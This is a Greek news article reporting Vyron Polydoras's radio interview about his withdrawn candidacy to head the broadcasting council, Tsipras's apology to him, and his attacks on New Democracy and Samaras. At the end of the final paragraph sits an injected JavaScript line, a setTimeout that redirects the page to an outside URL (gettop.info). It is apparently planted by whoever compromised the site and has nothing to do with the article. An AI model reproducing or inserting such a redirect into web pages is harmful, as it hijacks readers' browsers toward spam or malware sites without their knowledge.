Πολύδωρας: Ο Τσίπρας μου είπε συγγνώμη για την περιπέτεια

0
12

 

«Δέχτηκα bullying και άγριο τρολάρισμα και αντιμετώπισα το δίλημμα να προστατέψω την ψυχή και την αξιοπρέπειά μου ή να εποικοδομηθεί η πρόσκληση. Ένιωσα τιμώμενος. Δεν διαγράφω την ιστορία μου. Υπεράσπισα την τιμή και την αξιοπρέπειά μου με το ένστικτο και το μυαλό μου και πράγματι μπορεί να έκαψα την υποψηφιότητά μου» δήλωσε ο Βύρων Πολύδωρας σε συνέντευξη στον ALPHA 9.89 όπου μίλησε για την υποψηφιότητα του για τη θέση του προέδρου του ΕΣΡ και το πώς αυτή αντιμετωπίστηκε. Επίσης δεν παρέλειψε να κάνει επίθεση και στον Αντώνη Σαμαρά που τον διέγραψε από τη ΝΔ.

Οπως είπε τον πήρε τηλέφωνο προσωπικά ο πρωθυπουργός, λέγοντας «Μου είπε ο Τσίπρας: με συγχωρείς. Δεν ήθελα να κάνω κανένα πείραμα, δεν ήθελα να σε βάλω σε αυτή την περιπέτεια. Από τον Τσίπρα εισέπραξα περισσότερη κατανόηση από ό,τι από τους δικούς μου».

Στη συνέχεια έστρεψε τα βέλη του ενάντια στο πρώην κόμμα του αναφέροντας πως «η ΝΔ δεν μπήκε ποτέ μπροστά σε κανένα τρολάρισμα. Δεν είπε κανένας ότι η ζαρντινιέρα δεν είναι ίχνος υπαιτιότητάς μου. Είναι τόσο χονδροειδές και χιλιοπαιγμένο…Οι καλικάντζαροι από τα υπόγεια είτε της Συγγρού είτε της Πειραιώς παίζουν τώρα τη ζαρντινιέρα. Εγώ δεν έχω καμία σχέση με αυτό, εγώ ήμουν τιμωρός. Διέταξα ΕΔΕ από τις Βρυξέλλες και τέθηκαν σε διαθεσιμότητα οι 4 από τους 6 και οι άλλοι αντιμετώπισαν βαριές ποινές. Είναι αδύνατες πένες οι τρόλερ. Δεν τους τιμά το σύστημα δολοφονίας χαρακτήρων. Εγώ είμαι εδώ, όρθιος. Με παρουσιάζουν σαν Αρειανό με κεραίες στο κεφάλι και δυο γλομπάκια! Άμυνα θα κάνω και ας θέλουν να με πεθάνουν κοινωνικά ή πολιτικά. Δεν έχω θίξει κανέναν, άμα θέλω να το κάνω μπορώ να φτιάξω άρτια κατηγορητήρια αλλά δεν είναι καιρός».

Μιλώντας για τον πρώην πρωθυπουργό Αντώνη Σαμαρά τόνισε πως «με είχε διαγράψει ο κος Σαμαράς από τη ΝΔ. Ποιος διέγραψε ποιον; Εκείνος που έριξε την κυβέρνηση. Εκείνος που έλεγε ότι δεν πάει ούτε νεκρός στη ΝΔ; Δεν είπαν γιατί. Εγώ θεωρούσα κακό τον ΕΝΦΙΑ» ενώ για τον Κώστα Καραμανλή, υπό την ηγεσία του οποίου ήταν υπουργός, δήλωσε πως «έχουμε να μιλήσουμε 4 χρόνια γιατί ήταν με άλλους».

Σχολιάζοντας την υποψηφιότητα του και το πώς θα χειριζόταν το θέμα σε περίπτωση εκλογής του ξεκαθάρισε πως «Δεν πήγα για θέση. Ένιωθα δυνατός γι’ αυτή την πρόταση, ότι μπορούσα να προσφέρω. Ποιος έχει μεγαλύτερη πείρα από μένα; Εγώ πήρα θέση υποστηρίζοντας την ιδέα της νομιμότητας στο ραδιοτηλεοπτικό τοπίο. Δεν υποστηρίζω δηλαδή κάθε λεπτομέρεια του νόμου (Παππά). Συμμόρφωση προς την απόφαση του ΣΤΕ, είπα. Να έρθουν όλες οι αρμοδιότητες στο ΕΣΡ, να βάλω μπροστά την διαγωνιστική διαδικασία και να λειτουργήσουν με συναίνεση αμέσως. Να δοθούν 7-8 άδειες βεβαίως. Η συναίνεση δεν σημαίνει ότι πρέπει να είσαι άοσμος ή άγευστος. Εξάλλου εγώ με τους καναλάρχες είχα κάνει ως υπουργός συνεργασία και θέλω σειρά και τάξη, δεν έχω καμία κόντρα μαζί τους. Ήθελα αυτό το πνεύμα κατανόησης να το κάνω πολιτική πράξη και να δώσω διέξοδο με την παρουσία μου. Δεν είμαι ο αποσυνάγωγος. Πολλοί δημοσιογράφοι γράφουν πώς εγώ, ένας πατριώτης, να πάω με τον ΣΥΡΙΖΑ; Δεν οργανώνω την μεγάλη τακτική να ρίξω την κυβέρνηση».

Τέλος, σχολίασε και την τακτική της Νέας Δημοκρατίας στο θέμα της σύστασης του ΕΣΡ . «Τώρα θα συρθεί να ψηφίσει», ενώ τους προέτρεψε «να αφήσουν αυτά τα απόλυτα που έκανε και ο Σαμαράς και είδαμε τί έγινε. Αν βγει ο Μητσοτάκης δηλαδή θα του στρώσουν κανένα κόκκινο χαλί ή θα έρθουν οι επενδυτές; Οι Βρυξέλλες άδειασαν τον Σαμαρά και μπορεί να αδειάσουν και τον Κυριάκο». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here